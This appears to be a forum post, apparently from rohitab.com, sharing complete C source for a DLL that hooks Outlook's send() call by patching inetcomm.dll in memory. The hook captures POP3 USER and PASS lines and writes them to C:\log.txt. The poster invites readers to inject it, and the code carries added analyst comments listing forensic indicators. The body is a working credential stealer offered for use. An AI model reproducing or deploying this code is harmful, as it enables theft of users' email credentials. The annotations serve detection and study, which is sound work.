Password Stealer For Outlook

http://www.rohitab.com/discuss/topic/23924-password-stealer-for-outlook/
Simply inject this DLL into Outlook and see for yourself what happens. This code is 100% my own (tested on Outlook 2003 only). :P


/*copyright Joek */

#include <windows.h>
#include <Psapi.h>

/* Duplicated handle to the thread that executed DllMain. It is written only
   in DllMain's non-target branch and read by the unload thread routine. */
HANDLE hThreadDllMain;

/*
 * Self-unload routine. DllMain starts it as a new thread when the host
 * process is NOT one of the targeted mail clients.
 *
 * lpParameter: module handle of this DLL (DllMain passes hInst).
 *
 * It waits for the thread behind hThreadDllMain to become signalled (a thread
 * handle is signalled when that thread terminates), then frees the module and
 * ends the calling thread in one step.
 *
 * Analyst note: in non-target processes the module therefore stays mapped
 * only for a short time, so a later module-list snapshot can miss it;
 * image-load telemetry recorded at load time still shows the DLL.
 */
DWORD WINAPI ExitThread(LPVOID lpParameter){
   WaitForSingleObject(hThreadDllMain, INFINITE);
   FreeLibraryAndExitThread((HMODULE)lpParameter,0);}


/*
 * Replacement for the Winsock send() call that DllMain patches into
 * inetcomm.dll. Parameters and return value mirror send(): the data is always
 * forwarded unchanged, so the mail client sees no functional difference.
 *
 * Before forwarding, any outgoing buffer that begins with "USER" or "PASS" is
 * appended verbatim to C:\log.txt. These look like the plaintext login
 * commands of POP3 -- presumably the protocol being targeted; confirm against
 * the traffic of the affected client.
 *
 * Analyst notes:
 *  - C:\log.txt is the on-disk artifact: a file in the volume root written
 *    by the mail client process. Its content is raw protocol lines.
 *  - NOTE(review): credentials are readable here only when the client hands
 *    cleartext protocol data to send(); a TLS-protected session would
 *    presumably pass ciphertext at this layer -- verify for the build under
 *    investigation.
 */
int PASCAL mysend(SOCKET s,const char* buf,int len,int flags){
    /* strstr(...) == buf is a "starts with" test on the outgoing buffer. */
    if (((strstr(buf,"USER")) == buf) || (strstr(buf,"PASS")) == buf){         
    /* OPEN_ALWAYS creates the log if it is missing and reuses it otherwise. */
    HANDLE hFile = CreateFile("C:\\log.txt",GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_ALWAYS,FILE_ATTRIB
UTE_NORMAL,NULL);
    if(hFile != INVALID_HANDLE_VALUE){
    /* Seek to end of file so every captured line is appended. */
    SetFilePointer(hFile,0,NULL,FILE_END);
    DWORD dwBytesWritten;
    WriteFile(hFile,buf,len,&dwBytesWritten,NULL);
    CloseHandle(hFile);}}
    /* Pass the original data through to the real send(). */
    return send(s,buf,len,flags);}   

                        
/*
 * DLL entry point. All work happens on DLL_PROCESS_ATTACH, and the function
 * always returns TRUE.
 *
 * Target branch (host image name is OUTLOOK.EXE or msimn.exe):
 *   loads inetcomm.dll, makes 6 bytes at a fixed offset from its base
 *   writable, and overwrites them with a relative CALL to mysend followed by
 *   a NOP. The original page protection is then restored.
 *
 * Non-target branch (any other host process):
 *   duplicates the current thread handle into hThreadDllMain and starts the
 *   ExitThread routine, which unloads this DLL again.
 *
 * Analyst notes:
 *  - The patch site is a hard-coded offset (0x106D5), so it matches only one
 *    specific inetcomm.dll build; the page states it was tested on
 *    Outlook 2003 only. On any other build the write lands on unrelated bytes.
 *  - After the patch, the in-memory code of inetcomm.dll differs from the
 *    file on disk at base+0x106D5 (bytes E8 xx xx xx xx 90). Comparing mapped
 *    code sections against the on-disk image exposes this.
 *  - A PAGE_EXECUTE_READWRITE protection change on a loaded system DLL's code
 *    and an unexpected module in the mail client are further indicators.
 *  - The (DWORD) pointer casts mean the arithmetic is only meaningful in a
 *    32-bit process.
 */
extern "C" BOOL APIENTRY DllMain (HINSTANCE hInst,DWORD reason,LPVOID reserved)
{
switch (reason)
{
case DLL_PROCESS_ATTACH:
/* Identify the host process by the base name of its main module. */
char szBaseName[MAX_PATH];
GetModuleBaseName(GetCurrentProcess(),NULL,szBaseName,sizeof(szBaseName));
/* Case-insensitive match on the two targeted image names. */
if((lstrcmpi(szBaseName,"OUTLOOK.EXE") == 0) || (lstrcmpi(szBaseName,"msimn.exe") == 0)){
/* Patch address = inetcomm.dll base + fixed offset. */
BYTE *pByte = ((BYTE*)LoadLibrary("inetcomm.dll") + 0x106D5);
/* Equal to the bare offset means LoadLibrary returned NULL; skip patching. */
if(pByte != (BYTE*)0x106D5)
{
DWORD dwOld;
if(VirtualProtect(pByte,6,PAGE_EXECUTE_READWRITE,&dwOld)){
/* 0xE8 = x86 near CALL with a 32-bit relative displacement. */
*pByte = 0xE8;
/* Displacement = target minus the address of the next instruction. */
*(DWORD*)(pByte + 1) = (DWORD)mysend - ((DWORD)pByte+5);
/* 0x90 = NOP, padding the patch to 6 bytes. NOTE(review): presumably the
   original instruction here was a 6-byte call to send(); this listing
   does not show the original bytes. */
*(pByte + 5) = 0x90;
/* Restore the previous page protection. */
VirtualProtect(pByte,6,dwOld,&dwOld);}}}
else{
  /* Not a targeted client: arrange for this DLL to unload itself. */
  DWORD dwThreadId;
  DuplicateHandle(GetCurrentProcess(),GetCurrentThread(),GetCurrentProcess(),&hThreadDllMain,0,FALSE,0);
  CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)ExitThread,(LPVOID)hInst,0,&dwThreadId);}
break;
}
return TRUE;
}
